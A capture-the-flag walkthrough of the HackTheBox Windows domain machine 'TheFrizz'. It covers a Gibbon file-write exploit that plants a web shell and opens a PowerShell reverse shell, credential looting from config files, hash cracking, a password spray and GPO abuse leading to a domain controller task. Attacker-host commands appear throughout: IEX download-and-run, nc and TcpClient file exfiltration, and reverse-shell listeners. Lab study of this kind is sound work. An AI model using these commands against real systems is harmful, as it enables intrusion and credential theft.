HackTheBox: TheFrizz [Active Directory]

Table of Contents

[TOC]

Topic

Lab

Initial Enumeration

● Start Machine: 10.10.11.60

┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.60     
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:11 EDT
Nmap scan report for 10.10.11.60
Host is up (0.24s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-08 19:12:15Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-05-08T19:12:29
|_  start_date: N/A
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.24 seconds

Services: DNS, SSH, SMB, LDAP, HTTP, kpasswd5, Kerberos
Domain: frizz.htb HTTP: frizzdc.frizz.htb

SMB: smb2-security-mode Message signing enabled and required
SMB signing is required 👉🏻 Net-NTLM relaying is not an option. Also note the 6h59m59s clock skew reported by nmap; it matters for Kerberos later.

Edit /etc/hosts

┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts                           
10.10.11.60     frizzdc.frizz.htb frizz.htb
...

Browse to http://frizzdc.frizz.htb/home/

There is a strange string at the bottom of the page:
V2FudCB0byBsZWFybiBoYWNraW5n IGJ1dCBkb24ndCB3YW50IHRvIGdv IHRvIGphaWw/IFlvdSdsbCBsZWFy biB0aGUgaW4ncyBhbmQgb3V0cyBv ZiBTeXNjYWxscyBhbmQgWFNTIGZy b20gdGhlIHNhZmV0eSBvZiBpbnRl cm5hdGlvbmFsIHdhdGVycyBhbmQg aXJvbiBjbGFkIGNvbnRyYWN0cyBm cm9tIHlvdXIgY3VzdG9tZXJzLCBy ZXZpZXdlZCBieSBXYWxrZXJ2aWxs ZSdzIGZpbmVzdCBhdHRvcm5leXMu
(Base64 decoded)
Want to learn hacking but don't want to go to jail? You'll learn the in's and outs of Syscalls and XSS from the safety of international waters and iron clad contracts from your customers, reviewed by Walkerville's finest attorneys.

Nothing obviously vulnerable in the page source (view-source).

Gibbon v25.0.00

Solution

1. Search Exploit

  • Search exploit-db: Gibbon

If credentials are found, the authenticated RCE could be tried.

  • Search Google:

CVE-2023-45878
Look for a usable exploit

  • ffuf path
┌──(chw㉿CHW)-[~]
└─$ ffuf -t 50 -r -w /usr/share/dirb/wordlists/common.txt -u http://frizzdc.frizz.htb/FUZZ -e .git,.php,.bak,.zip 

Nothing useful found.

2. CVE-2023-45878 Exploit

Use the CVE-2023-45878 exploit to get a reverse shell

┌──(chw㉿CHW)-[~/Tools/CVE-exploit/CVE-2023-4587_Gibbon_v25_File_Write]
└─$ python3 CVE-2023-45878.py -t frizzdc.frizz.htb -s -i {Kali IP} -p 8888  
[+] Uploading web shell as xjfsjhmk.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://frizzdc.frizz.htb/Gibbon-LMS/xjfsjhmk.php
[*] Make sure your listener is running: nc -lvnp 8888
[+] Executing command on: http://frizzdc.frizz.htb/Gibbon-LMS/xjfsjhmk.php?cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand CgAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADEANwA5ACIALAA4ADgAOAA4ACkAOwAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAg...
[!] Error connecting to web shell: HTTPConnectionPool(host='frizzdc.frizz.htb', port=80): Read timed out. (read timeout=5)

Start a listener

┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888   
listening on [any] 8888 ...

Reverse shell received (and this box is rated Medium?!!)

┌──(chw㉿CHW)-[~]
└─$ nc -nvlp 8888   
listening on [any] 8888 ...
connect to [10.10.14.179] from (UNKNOWN) [10.10.11.60] 49891
PS C:\xampp\htdocs\Gibbon-LMS> whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS> net user /domain

User accounts for \\FRIZZDC

-------------------------------------------------------------------------------
a.perlstein              Administrator            c.ramon                  
c.sandiego               d.hudson                 f.frizzle                
g.frizzle                Guest                    h.arm                    
J.perlstein              k.franklin               krbtgt                   
l.awesome                m.ramon                  M.SchoolBus              
p.terese                 r.tennelli               t.wright                 
v.frizzle                w.li                     w.Webservice             
The command completed successfully.

PS C:\xampp\htdocs\Gibbon-LMS> net user w.webservice
User name                    w.Webservice
Full Name                    webservice Webservice
Comment                      Service for the website
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/29/2024 7:27:04 AM
Password expires             Never
Password changeable          10/29/2024 7:27:04 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/8/2025 10:03:24 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

The users were enumerated in order to try AS-REP Roasting.

3. AS-REP Roasting

Find accounts that do not require Kerberos pre-authentication:

┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_name.txt 
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle            
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt  
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservice

┌──(chw㉿CHW)-[~]
└─$ impacket-GetNPUsers frizz.htb/ -dc-ip 10.10.11.60 -no-pass -usersfile TheFrizz_name.txt                         
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies 

/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User a.perlstein doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.ramon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User c.sandiego doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User d.hudson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User f.frizzle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User g.frizzle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User h.arm doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.perlstein doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User k.franklin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User l.awesome doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User m.ramon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User M.SchoolBus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User p.terese doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User r.tennelli doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User t.wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User v.frizzle doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User w.li doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User w.Webservice doesn't have UF_DONT_REQUIRE_PREAUTH set

No user without Kerberos pre-authentication was found. (The two KDC_ERR_CLIENT_REVOKED lines fall at the positions of Guest and krbtgt in the list; that error means the account is disabled, not that it is roastable.)

🧠 Ideas:

  1. Privilege escalation
  2. Obtain w.Webservice's credentials and try Kerberoasting

Tried several approaches; all failed.

I had overlooked that the files under C:\xampp are readable.

4. C:\xampp

Shells uploaded by other players are visible here 🐚

  • C:\xampp\mysql\backup\my.ini

  • C:\xampp\mysql\README.md

MariaDB

  • C:\xampp\mysql\data\mysql\global_priv.*

  • C:\xampp\mysql\data\global_priv.MAD

Host: localhost
User: root
Hash: *87323B8D2F18F7090F3655A9B69B4AE2A074AB0C

Host: localhost
User: MrGibbonsDB
Hash: *65A8BE9B3524B64167F92587F87F4B3D50EB2383

5. Hashcat

┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_sql.hash 
87323B8D2F18F7090F3655A9B69B4AE2A074AB0C
65A8BE9B3524B64167F92587F87F4B3D50EB2383

┌──(chw㉿CHW)-[~]
└─$ hashcat -m 300 -a 0 TheFrizz_sql.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force 
...

This takes forever.

Back to the XAMPP configuration files

  • C:\xampp\htdocs\Gibbon-LMS\config.php
    😐😐😐

MrGibbonsDB:MisterGibbs!Parrot!?1

Although the server does not expose port 3389, C:\xampp\mysql\bin\mysql.exe exists on the system.

6. MySQL

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -e "show databases;" 
Database
gibbon
information_schema
test

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -D gibbon -e "show tables;"
Tables_in_gibbon
gibbonaction
gibbonactivity
gibbonactivityattendance
gibbonactivityslot
gibbonactivitystaff
gibbonactivitystudent
gibbonactivitytype
gibbonadmissionsaccount
gibbonadmissionsapplication
gibbonalarm
gibbonalarmconfirm
...
gibbonperson
gibbonpersonaldocument
gibbonpersonaldocumenttype
gibbonpersonmedical
gibbonpersonmedicalcondition
gibbonpersonmedicalconditionupdate
gibbonpersonmedicalupdate
gibbonpersonreset
gibbonpersonstatuslog
...

gibbonperson: probably holds the user information

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -p"MisterGibbs!Parrot!?1" -D gibbon -e "SELECT * FROM gibbonperson;"      
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters        gender  username    passwordStrong   passwordStrongSalt      passwordForceReset      status  canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll      dob     email   emailAlternate  image_240       lastIPAddress   lastTimestamp   lastFailIPAddress       lastFailTimestamp    failCount       address1        address1District        address1Country address2        address2District        address2Country      phone1Type      phone1CountryCode       phone1  phone3Type      phone3CountryCode       phone3  phone2Type  phone2CountryCode        phone2  phone4Type      phone4CountryCode       phone4  website languageFirst   languageSecond  languageThird        countryOfBirth  birthCertificateScan    ethnicity       religion        profession      employer        jobTitle     emergency1Name  emergency1Number1       emergency1Number2       emergency1Relationship  emergency2Name  emergency2Number1    emergency2Number2       emergency2Relationship  gibbonHouseID   studentID       dateStart       dateEnd gibbonSchoolYearIDClassOf    lastSchool      nextSchool      departureReason transport       transportNotes  calendarFeedPersonal    viewCalendarSchool   viewCalendarPersonal    viewCalendarSpaceBooking        gibbonApplicationFormID lockerNumber    vehicleRegistration  personalBackground      messengerLastRead       privacy dayType gibbonThemeIDPersonal   gibboni18nIDPersonal    studentAgreements    googleAPIRefreshToken   microsoftAPIRefreshToken        genericAPIRefreshToken  receiveNotificationEmails   mfaSecret        mfaToken        cookieConsent   fields
0000000001      Ms.     Frizzle Fiona   Fiona   Fiona Frizzle           Unspecified     f.frizzle       067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03     /aACFhikmNopqrRTVz2489  N       Full    Y       001     001     NULL    f.frizzle@frizz.htb  NULL    NULL    ::1     2024-10-29 09:28:59     NULL    NULL    0                                           NULL             NULL    NULL    NULL                                                    Y       Y       N       NULL        NULL     NULL    NULL    NULL    NULL    NULL                            Y       NULL    NULL    NULL

f.frizzle:067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 Salt: /aACFhikmNopqrRTVz2489

7. Hashcat again

Hashcat mode: 1420 (sha256($salt.$pass))

┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_gibbon.hash
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
┌──(chw㉿CHW)-[~]
└─$ hashcat -m 1420 -a 0 TheFrizz_gibbon.hash /usr/share/wordlists/rockyou.txt --force -O
hashcat (v6.2.6) starting
...
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni******Magic23

f.frizzle:Jenni******Magic23
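Added example (not code from the writeup) showing how the two hash formats recovered above are built, which is why hashcat modes 300 (MySQL native password) and 1420 (sha256($salt.$pass), Gibbon's passwordStrong with passwordStrongSalt) apply. The passwords used below are constructed placeholders, not the box's real ones.

```python
"""Derivation and verification of the two hash formats seen on this box:
MariaDB/MySQL mysql_native_password and Gibbon's salted SHA-256.
Constructed example; sample passwords are placeholders."""
import hashlib
import hmac
import re


def mysql_native_password(password: str) -> str:
    """mysql_native_password: '*' + SHA1(SHA1(password)), upper-case hex.
    This is the format of the '*87323B8D...' values in global_priv.MAD (hashcat -m 300)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def gibbon_password_strong(salt: str, password: str) -> str:
    """Gibbon stores passwordStrong = sha256(passwordStrongSalt . password) as lower-case hex.
    hashcat mode 1420 is exactly sha256($salt.$pass), fed as 'hash:salt' per line."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def gibbon_verify(stored_hash: str, salt: str, candidate: str) -> bool:
    """Constant-time check of a candidate password against a gibbonperson row."""
    return hmac.compare_digest(gibbon_password_strong(salt, candidate), stored_hash)


def to_hashcat_line(stored_hash: str, salt: str = "") -> str:
    """Build the line formats used in TheFrizz_sql.hash and TheFrizz_gibbon.hash:
    mode 300 wants the 40 hex chars without the '*', mode 1420 wants 'hash:salt'."""
    if stored_hash.startswith("*"):
        return stored_hash[1:]
    return f"{stored_hash}:{salt}"


MYSQL_RE = re.compile(r"^\*?[0-9A-Fa-f]{40}$")
GIBBON_RE = re.compile(r"^[0-9a-f]{64}:.+$")


def hashcat_mode_for(line: str):
    """Map a hash line to the hashcat mode used in the writeup, or None if unrecognised."""
    if MYSQL_RE.match(line):
        return 300
    if GIBBON_RE.match(line):
        return 1420
    return None
```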

  1. Try logging in to Gibbon at http://frizzdc.frizz.htb/Gibbon-LMS/

Nothing useful there.

  2. Try logging in over SSH
┌──(chw㉿CHW)-[~]
└─$ ssh f.frizzle@10.10.11.60

f.frizzle@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).

┌──(chw㉿CHW)-[~]
└─$ sshpass -p 'Jenni******Magic23' ssh -o PreferredAuthentications=password f.frizzle@10.10.11.60

f.frizzle@10.10.11.60: Permission denied (gssapi-with-mic,keyboard-interactive).

Login is denied?!

8. Kerberoasting

┌──(chw㉿CHW)-[~]
└─$ sudo ntpdate -u 10.10.11.60                                                      
2025-05-18 13:29:13.245591 (-0400) +25201.312121 +/- 0.169647 10.10.11.60 s1 no-leap
CLOCK: time stepped by 25201.312121

┌──(chw㉿CHW)-[~]
└─$ impacket-getTGT frizz.htb/'f.frizzle':'Jenni******Magic23' -dc-ip 10.10.11.60                              
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies 

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

The clock skew with the target is too large. ntpdate -u alone does not fix it, because the system automatically re-syncs the time afterwards.

  1. sudo su
  2. timedatectl set-ntp off: disable automatic NTP time updates
  3. rdate -n [Target IP]

Ref: https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069

┌──(chw㉿CHW)-[~]
└─$ sudo su                                     

┌──(root㉿CHW)-[/home/chw]
└─# timedatectl set-ntp off

┌──(root㉿CHW)-[/home/chw]
└─# sudo ntpdate -u 10.10.11.60

2025-06-08 05:18:09.854773 (-0400) +484.270476 +/- 0.091010 10.10.11.60 s1 no-leap
CLOCK: time stepped by 484.270476
                                                        
┌──(root㉿CHW)-[/home/chw]
└─# impacket-getTGT frizz.htb/f.frizzle:Jenni******Magic23 -dc-ip 10.10.11.60 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in f.frizzle.ccache
                                                           
┌──(root㉿CHW)-[/home/chw]
└─# export KRB5CCNAME=f.frizzle.ccache
impacket-GetUserSPNs -request -dc-ip 10.10.11.60 -dc-host frizzdc.frizz.htb -k -no-pass frizz.htb/f.frizzle
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

No entries found!

No Kerberoastable SPN services were found using f.frizzle

9. SSH

┌──(root㉿CHW)-[/home/chw]
└─# impacket-getTGT frizz.htb/f.frizzle:Jenni******Magic23 -dc-ip 10.10.11.60

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in f.frizzle.ccache
┌──(root㉿CHW)-[/home/chw]
└─# KRB5CCNAME=f.frizzle.ccache ssh -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes f.frizzle@frizz.htb
f.frizzle@frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).

┌──(chw㉿CHW)-[~]
└─$ KRB5CCNAME=f.frizzle.ccache ssh -vv -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes f.frizzle@frizzdc.frizz.htb
...
Cannot find KDC for realm "FRIZZ.HTB"
...
f.frizzle@frizzdc.frizz.htb: Permission denied (gssapi-with-mic,keyboard-interactive).

Following a helpful write-up, configure /etc/krb5.conf and add the realm and KDC address manually

┌──(chw㉿CHW)-[~]
└─$ cat /etc/krb5.conf 
[libdefaults]
  default_realm = FRIZZ.HTB
  dns_lookup_realm = false
  dns_lookup_kdc = false

[realms]
  FRIZZ.HTB = {
    kdc = 10.10.11.60
  }

[domain_realm]
  .frizz.htb = FRIZZ.HTB
  frizz.htb = FRIZZ.HTB

Try SSH again

┌──(chw㉿CHW)-[~]
└─$ KRB5CCNAME=/home/chw/f.frizzle.ccache ssh -vv -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes f.frizzle@frizzdc.frizz.htb
...
PS C:\Users\f.frizzle\Desktop> whoami
frizz\f.frizzle
PS C:\Users\f.frizzle>

✅ Get User Flag

The user flag is in C:\Users\f.frizzle\Desktop

Privilege Escalation

10. BloodHound

┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80                                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

SharpHound collection

PS C:\Users\f.frizzle\Desktop> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.71/SharpHound.ps1')
PS C:\Users\f.frizzle\Desktop> Get-Command Invoke-BloodHound

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Invoke-BloodHound


PS C:\Users\f.frizzle\Desktop> Invoke-BloodHound -CollectionMethod All -OutputDirectory "C:\Users\f.frizzle\Desktop\"
...

Send the collected data back to Kali

PS C:\Users\f.frizzle\Desktop> (New-Object Net.WebClient).DownloadFile("http://10.10.14.71/nc.exe", "C:\Users\f.frizzle\Desktop\nc.exe")

PS C:\Users\f.frizzle\Desktop> type .\20250518152732_BloodHound.zip | .\nc.exe 10.10.14.71 55688

( Kali )

┌──(chw㉿CHW)-[~]
└─$ nc -lvnp 55688 > TheFrizz.zip
listening on [any] 55688 ...
connect to [10.10.14.71] from (UNKNOWN) [10.10.11.60] 62675

TheFrizz.zip

BloodHound analysis

Domain admin: V.FRIZZLE & ADMINISTRATOR

  • Mark the compromised users as Owned

f.frizzle & w.webservice

  • Check f.frizzle's rights (INBOUND CONTROL RIGHTS and OUTBOUND OBJECT CONTROL)

Not a member of Domain Admins 😐
f.frizzle is a member of Remote Management Users

  • Check f.frizzle's "Shortest Paths to Domain Admins from Owned Principals"

f.frizzle has no high-value rights such as GenericAll / WriteDACL / AddMember;
only CanPSRemote, i.e. remote login to FRIZZDC

Out of ideas 🫠 Checked other write-ups 👉🏻 Recycle Bin ♻️ 🗑️ 🚮

11. Recycle Bin ♻️ 🗑️ 🚮

Create the Shell.Application COM object (an object that drives the Windows Explorer shell)

  • Namespace(0xA) is the Recycle Bin
  • Namespace(0x10) is the current user's Desktop folder

$shell = New-Object -ComObject Shell.Application
$recycleBin = $shell.Namespace(0xA)
$recycleBin.Items() | Select-Object Name, Path

Name                  Path
----                  ----
wapt-backup-sunday.7z C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z

$item = $recycleBin.Items() | Where-Object {$_.Name -eq "wapt-backup-sunday.7z"}
$desktop = (New-Object -ComObject Shell.Application).Namespace(0x10)
$desktop.MoveHere($item)
PS C:\Users\f.frizzle> ls .\Desktop\

    Directory: C:\Users\f.frizzle\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar--            6/6/2025  8:19 PM             34 user.txt
-a---          10/24/2024  9:16 PM       30416987 wapt-backup-sunday.7z

Found the archive wapt-backup-sunday.7z and moved it to the user's Desktop

11.1 Transfer back to Kali

(Kali)

┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ python3 -m http.server 80 

(Windows)

PS C:\Users\f.frizzle> (New-Object Net.WebClient).DownloadFile('http://10.10.14.207/nc.exe', 'C:\Users\f.frizzle\Desktop\nc.exe')

PS C:\Users\f.frizzle> ls .\Desktop\

    Directory: C:\Users\f.frizzle\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---            6/8/2025  3:07 AM          38616 nc.exe
-ar--            6/6/2025  8:19 PM             34 user.txt
-a---          10/24/2024  9:16 PM       30416987 wapt-backup-sunday.7z

Send it back to Kali with nc:
(Kali)

┌──(chw㉿CHW)-[~]
└─$ nc -lvnp 55688 > wapt-backup-sunday.7z
listening on [any] 55688 ...

(Windows)

$client = New-Object System.Net.Sockets.TcpClient("10.10.14.207", 55688)
$stream = $client.GetStream()
$data = [System.IO.File]::ReadAllBytes("C:\Users\f.frizzle\Desktop\wapt-backup-sunday.7z")
$stream.Write($data, 0, $data.Length)
$stream.Close()
$client.Close()

11.2 Analyse wapt-backup-sunday.7z

┌──(chw㉿CHW)-[~]
└─$ 7z x wapt-backup-sunday.7z


wapt_password found in conf/waptserver.ini (Base64 decoded): !suBcig@******!R

Next, find which user this password belongs to

12. Kerbrute passwordspray

Build TheFrizz_user.txt from the output of net user /domain

PS C:\Users\f.frizzle\Desktop> net user /domain

User accounts for \\

-------------------------------------------------------------------------------
a.perlstein              Administrator            c.ramon                  
c.sandiego               d.hudson                 f.frizzle                
g.frizzle                Guest                    h.arm                    
J.perlstein              k.franklin               krbtgt                   
l.awesome                m.ramon                  M.SchoolBus              
p.terese                 r.tennelli               t.wright                 
v.frizzle                w.li                     w.Webservice             
The command completed with one or more errors.

PS C:\Users\f.frizzle\Desktop>

Run the password spray

┌──(chw㉿CHW)-[~]
└─$ cat TheFrizz_user.txt           
a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
...

┌──(chw㉿CHW)-[~]
└─$ kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 \TheFrizz_user.txt '!suBcig@******!R'


    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 06/08/25 - Ronnie Flathers @ropnop

2025/06/08 17:30:57 >  Using KDC(s):
2025/06/08 17:30:57 >   10.10.11.60:88

2025/06/08 17:31:01 >  [+] VALID LOGIN:  M.SchoolBus@frizz.htb:!suBcig@******!R
2025/06/08 17:31:01 >  Done! Tested 21 logins (1 successes) in 3.739 seconds

M.SchoolBus@frizz.htb:!suBcig@******!R

12.1 Confirm M.SchoolBus can log in

┌──(chw㉿CHW)-[~]
└─$ impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@******!R' -dc-ip 10.10.11.60

Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in M.SchoolBus.ccache
                        
┌──(chw㉿CHW)-[~]
└─$ KRB5CCNAME=/home/chw/M.SchoolBus.ccache ssh -K -oGSSAPIAuthentication=yes -oGSSAPIDelegateCredentials=yes M.SchoolBus@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus> 
PS C:\Users\M.SchoolBus>

13. BloodHound

Back to BloodHound

  • Mark M.SchoolBus as Owned

  • Check M.SchoolBus's rights (INBOUND CONTROL RIGHTS and OUTBOUND OBJECT CONTROL)

  • Check f.frizzle's "Shortest Paths to Domain Admins from Owned Principals"

14. Group Policy Object (GPO) Abuse

14.1 Check group membership

PS C:\Users\M.SchoolBus\Desktop> ls

    Directory: C:\Users\M.SchoolBus\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---            6/8/2025  3:52 PM          80896 SharpGPOAbuse.exe

PS C:\Users\M.SchoolBus\Desktop> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                   Type             SID                                            Attributes                             
                        
============================================ ================ ============================================== ===============================================================
Everyone                                     Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group             
BUILTIN\Remote Management Users              Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                                Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
...
NT AUTHORITY\Authenticated Users             Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization               Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins                         Group            S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners            Group            S-1-5-21-2386970044-1145388522-2932701813-520  Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity   Well-known group S-1-18-1                                       Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias            S-1-5-21-2386970044-1145388522-2932701813-572  Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level       Label            S-1-16-8192  

frizz\Group Policy Creator Owners: members of this built-in group can create GPOs, so creating a malicious GPO is worth trying

14.2 Create a GPO with New-GPO

New-GPO -Name <name>
Creates a GPC in AD: CN={GUID},CN=Policies,CN=System,<domainDN> (the object's DN is named after its GUID)
Creates the matching GPT in SYSVOL: \\<domain>\SYSVOL\<domain>\Policies\{GUID}\. The creator becomes the Owner (and has Full Control over that GPO).

PS C:\Users\M.SchoolBus\Desktop> New-GPO -Name chw | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes    

GpoId       : 0329b9b2-02c7-4796-a039-fb5123d758fb
DisplayName : chw
Enabled     : True
Enforced    : False
Target      : OU=Domain Controllers,DC=frizz,DC=htb
Order       : 3

"OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB": links this GPO to the Domain Controllers OU

14.3 Use SharpGPOAbuse.exe

(Upload SharpGPOAbuse.exe from Kali)

┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ sudo ntpdate -u 10.10.11.60                                        
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ impacket-getTGT frizz.htb/M.SchoolBus:'!suBcig@******!R' -dc-ip 10.10.11.60
...
[*] Saving ticket in M.SchoolBus.ccache                                                        
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ export KRB5CCNAME=M.SchoolBus.ccache                       
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ KRB5CCNAME=M.SchoolBus.ccache \
scp -P 22 -o GSSAPIAuthentication=yes -o PreferredAuthentications=gssapi-with-mic \
  ./SharpGPOAbuse.exe m.schoolbus@frizz.htb:"C:/Users/m.schoolbus/Desktop/"
SharpGPOAbuse.exe                                                                                                 100%   79KB  70.3KB/s   00:01    
┌──(chw㉿CHW)-[~/Desktop/upload_tools]
└─$ nc -lvnp 8888               
listening on [any] 8888 ...

(Windows: M.SchoolBus)

PS C:\Users\M.SchoolBus\Desktop> .\SharpGPOAbuse.exe --addcomputertask --gponame "chw" --author TCG --taskname PrivEsc --command "powershell.exe" --arguments "powershell -e <Base64>"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
